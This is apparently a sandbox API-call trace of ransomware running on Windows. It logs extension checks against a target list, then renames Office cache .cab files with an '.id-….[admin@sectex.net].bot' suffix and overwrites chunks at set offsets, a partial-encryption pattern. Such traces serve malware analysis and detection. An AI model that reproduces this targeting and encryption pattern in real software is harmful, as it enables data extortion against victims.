	[0045.623] lstrlenW (lpString=".7z") returned 3
	[0045.623] lstrcmpiW (lpString1=".7z", lpString2="MST") returned -1
	[0045.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74
	[0045.624] lstrlenW (lpString=".dbf") returned 4
	[0045.624] lstrcmpiW (lpString1=".dbf", lpString2=".MST") returned -1
	[0045.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74
	[0045.624] lstrlenW (lpString=".1cd") returned 4
	[0045.624] lstrcmpiW (lpString1=".1cd", lpString2=".MST") returned -1
	[0045.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74
	[0045.624] lstrlenW (lpString=".jpg") returned 4
	[0045.624] lstrcmpiW (lpString1=".jpg", lpString2=".MST") returned -1
	[0045.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74
	[0045.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74
	[0045.624] lstrlenW (lpString=".doc") returned 4
	[0045.624] lstrcmpiW (lpString1=".doc", lpString2=".MST") returned -1
	[0045.624] lstrlenW (lpString=".docx") returned 5
	[0045.624] lstrcmpiW (lpString1=".docx", lpString2="I.MST") returned -1
	[0045.624] lstrlenW (lpString=".pdf") returned 4
	[0045.624] lstrcmpiW (lpString1=".pdf", lpString2=".MST") returned 1
	[0045.624] lstrlenW (lpString=".xls") returned 4
	[0045.624] lstrcmpiW (lpString1=".xls", lpString2=".MST") returned 1
	[0045.624] lstrlenW (lpString=".xlsx") returned 5
	[0045.624] lstrcmpiW (lpString1=".xlsx", lpString2="I.MST") returned -1
	[0045.624] lstrlenW (lpString=".ppt") returned 4
	[0045.624] lstrcmpiW (lpString1=".ppt", lpString2=".MST") returned 1
	[0045.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74
	[0045.624] lstrlenW (lpString=".zip") returned 4
	[0045.624] lstrcmpiW (lpString1=".zip", lpString2=".MST") returned 1
	[0045.624] lstrlenW (lpString=".rar") returned 4
	[0045.624] lstrcmpiW (lpString1=".rar", lpString2=".MST") returned 1
	[0045.624] lstrlenW (lpString=".bz2") returned 4
	[0045.624] lstrcmpiW (lpString1=".bz2", lpString2=".MST") returned -1
	[0045.624] lstrlenW (lpString=".7z") returned 3
	[0045.624] lstrcmpiW (lpString1=".7z", lpString2="MST") returned -1
	[0045.624] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74
	[0045.624] lstrlenW (lpString=".dbf") returned 4
	[0045.625] lstrcmpiW (lpString1=".dbf", lpString2=".MST") returned -1
	[0045.625] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74
	[0045.625] lstrlenW (lpString=".1cd") returned 4
	[0045.625] lstrcmpiW (lpString1=".1cd", lpString2=".MST") returned -1
	[0045.625] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74
	[0045.625] lstrlenW (lpString=".jpg") returned 4
	[0045.625] lstrcmpiW (lpString1=".jpg", lpString2=".MST") returned -1
	[0045.625] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0045.625] lstrlenW (lpString="AccLR.cab") returned 9
	[0045.625] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0046.015] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=28016276) returned 1
	[0046.037] CloseHandle (hObject=0x1d0) returned 1
	[0046.113] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab")) returned 0x2020
	[0046.116] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.118] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0046.124] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0046.124] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0046.124] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.124] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.129] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.129] ReadFile (in: hFile=0x1d0, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.134] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0046.134] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.134] ReadFile (in: hFile=0x1d0, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.149] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.149] WriteFile (in: hFile=0x1d0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc00fe, lpOverlapped=0x0) returned 1
	[0046.342] SetEndOfFile (hFile=0x1d0) returned 1
	[0046.342] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb50b818
	[0046.450] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.450] WriteFile (in: hFile=0x1d0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.451] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x8e7f86, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.451] WriteFile (in: hFile=0x1d0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.453] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x1a77e94, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.453] WriteFile (in: hFile=0x1d0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.455] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb50b818 | out: hHeap=0x7d60000) returned 1
	[0046.455] CloseHandle (hObject=0x1d0) returned 1
	[0046.456] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0046.456] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85
	[0046.456] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85
	[0046.456] lstrlenW (lpString=".doc") returned 4
	[0046.456] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0046.456] lstrlenW (lpString=".docx") returned 5
	[0046.456] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0046.456] lstrlenW (lpString=".pdf") returned 4
	[0046.456] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0046.456] lstrlenW (lpString=".xls") returned 4
	[0046.456] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0046.456] lstrlenW (lpString=".xlsx") returned 5
	[0046.456] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0046.456] lstrlenW (lpString=".ppt") returned 4
	[0046.456] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0046.456] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85
	[0046.456] lstrlenW (lpString=".zip") returned 4
	[0046.456] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0046.456] lstrlenW (lpString=".rar") returned 4
	[0046.456] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0046.456] lstrlenW (lpString=".bz2") returned 4
	[0046.456] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0046.457] lstrlenW (lpString=".7z") returned 3
	[0046.457] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0046.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85
	[0046.457] lstrlenW (lpString=".dbf") returned 4
	[0046.457] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0046.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85
	[0046.457] lstrlenW (lpString=".1cd") returned 4
	[0046.457] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0046.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85
	[0046.457] lstrlenW (lpString=".jpg") returned 4
	[0046.457] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0046.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85
	[0046.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85
	[0046.457] lstrlenW (lpString=".doc") returned 4
	[0046.457] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0046.457] lstrlenW (lpString=".docx") returned 5
	[0046.457] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0046.457] lstrlenW (lpString=".pdf") returned 4
	[0046.457] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0046.457] lstrlenW (lpString=".xls") returned 4
	[0046.457] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0046.457] lstrlenW (lpString=".xlsx") returned 5
	[0046.457] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0046.457] lstrlenW (lpString=".ppt") returned 4
	[0046.457] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0046.457] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85
	[0046.457] lstrlenW (lpString=".zip") returned 4
	[0046.457] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0046.457] lstrlenW (lpString=".rar") returned 4
	[0046.457] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0046.457] lstrlenW (lpString=".bz2") returned 4
	[0046.457] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0046.457] lstrlenW (lpString=".7z") returned 3
	[0046.457] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0046.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85
	[0046.458] lstrlenW (lpString=".dbf") returned 4
	[0046.458] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0046.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85
	[0046.458] lstrlenW (lpString=".1cd") returned 4
	[0046.458] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0046.458] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 85
	[0046.458] lstrlenW (lpString=".jpg") returned 4
	[0046.458] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0046.458] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0046.458] lstrlenW (lpString="OWOW32WW.cab") returned 12
	[0046.458] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0046.458] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=36233052) returned 1
	[0046.458] CloseHandle (hObject=0x1d0) returned 1
	[0046.458] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020
	[0046.458] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0046.459] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0046.459] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0046.459] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0x0) returned 1
	[0046.459] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.459] ReadFile (in: hFile=0x1d0, lpBuffer=0xac70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xac70058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.524] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.526] ReadFile (in: hFile=0x1d0, lpBuffer=0xacb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacb0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.574] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa05fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0046.574] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc2c | out: lpNewFilePointer=0x0) returned 1
	[0046.574] ReadFile (in: hFile=0x1d0, lpBuffer=0xacf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa05fc38, lpOverlapped=0x0 | out: lpBuffer=0xacf0058*, lpNumberOfBytesRead=0xa05fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0046.594] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0046.594] WriteFile (in: hFile=0x1d0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa05fcb0, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0046.861] SetEndOfFile (hFile=0x1d0) returned 1
	[0046.861] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0046.861] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.861] WriteFile (in: hFile=0x1d0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.862] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.862] WriteFile (in: hFile=0x1d0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.862] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0xa05fc7c | out: lpNewFilePointer=0x0) returned 1
	[0046.863] WriteFile (in: hFile=0x1d0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa05fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa05fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0046.864] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0046.864] CloseHandle (hObject=0x1d0) returned 1
	[0046.865] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0046.865] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0046.865] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0046.865] lstrlenW (lpString=".doc") returned 4
	[0046.865] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0046.865] lstrlenW (lpString=".docx") returned 5
	[0046.865] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1
	[0046.865] lstrlenW (lpString=".pdf") returned 4
	[0046.865] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0046.865] lstrlenW (lpString=".xls") returned 4
	[0046.865] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0046.865] lstrlenW (lpString=".xlsx") returned 5
	[0046.865] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1
	[0046.865] lstrlenW (lpString=".ppt") returned 4
	[0046.865] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0046.865] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0046.865] lstrlenW (lpString=".zip") returned 4
	[0046.865] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0046.865] lstrlenW (lpString=".rar") returned 4
	[0046.865] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0046.865] lstrlenW (lpString=".bz2") returned 4
	[0046.866] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0046.866] lstrlenW (lpString=".7z") returned 3
	[0046.866] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0046.866] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0046.866] lstrlenW (lpString=".dbf") returned 4
	[0046.866] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0046.866] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0046.866] lstrlenW (lpString=".1cd") returned 4
	[0046.866] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0046.866] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0046.866] lstrlenW (lpString=".jpg") returned 4
	[0046.866] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0046.866] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0046.866] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0046.866] lstrlenW (lpString=".doc") returned 4
	[0046.866] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0046.866] lstrlenW (lpString=".docx") returned 5
	[0046.866] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1
	[0046.866] lstrlenW (lpString=".pdf") returned 4
	[0046.866] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0046.866] lstrlenW (lpString=".xls") returned 4
	[0046.866] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0046.866] lstrlenW (lpString=".xlsx") returned 5
	[0046.866] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1
	[0046.866] lstrlenW (lpString=".ppt") returned 4
	[0046.866] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0046.866] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0046.866] lstrlenW (lpString=".zip") returned 4
	[0046.866] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0046.866] lstrlenW (lpString=".rar") returned 4
	[0046.866] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0046.866] lstrlenW (lpString=".bz2") returned 4
	[0046.866] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0046.867] lstrlenW (lpString=".7z") returned 3
	[0046.867] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0046.867] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0046.867] lstrlenW (lpString=".dbf") returned 4
	[0046.867] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0046.867] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0046.867] lstrlenW (lpString=".1cd") returned 4
	[0046.867] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0046.867] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75
	[0046.867] lstrlenW (lpString=".jpg") returned 4
	[0046.867] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0046.867] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0046.867] lstrlenW (lpString="ProPrWW2.cab") returned 12
	[0046.867] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0046.867] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=222948913) returned 1
	[0046.867] CloseHandle (hObject=0x1d0) returned 1
	[0046.867] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ProPrWW2.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\proprww2.cab")) returned 0x2020
